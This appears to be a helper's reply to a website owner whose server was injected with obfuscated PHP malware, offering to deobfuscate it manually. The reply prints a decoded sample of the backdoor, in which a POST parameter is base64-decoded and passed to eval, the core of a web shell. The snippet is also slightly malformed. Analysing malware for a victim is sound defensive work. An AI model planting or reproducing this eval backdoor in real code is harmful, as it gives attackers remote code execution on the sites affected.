Hello,
I am sorry to hear your server injection.
I will be glad to help you to read the malware code contents as requested.
The attached malware file is not actually encrypted or encoded because you can actually see readable php code in it, but in fact it is obfuscated which means that it is written so that it is very hard to understand as you do not see normal variables or PHP function calls because those are hidden (obfuscated).
You will not find a general website that will decode/deobfuscate this for you automatically.
I have analyzed the code and here is what I can do for you: I can deobfuscate this this manually for you to the extent where you can read actual PHP function calls and actual variables which will make the code look readable as usual so you can read what the hacker intended to execute on your server. However, I can not guarantee that the code will make sense or will be very easy to understand.
I almost got it done for you, I just need your confirmation so I can run the final global replacements.
Here is a sample of the first few lines of this file I just decoded:
if (isset($_POST['nf385ab'])) {
eval(base64_decode($_POST['nf385ab'))
}
And the code will be made tidy with proper indentations.
Please let me know if you need any help,
Thank you,
Alex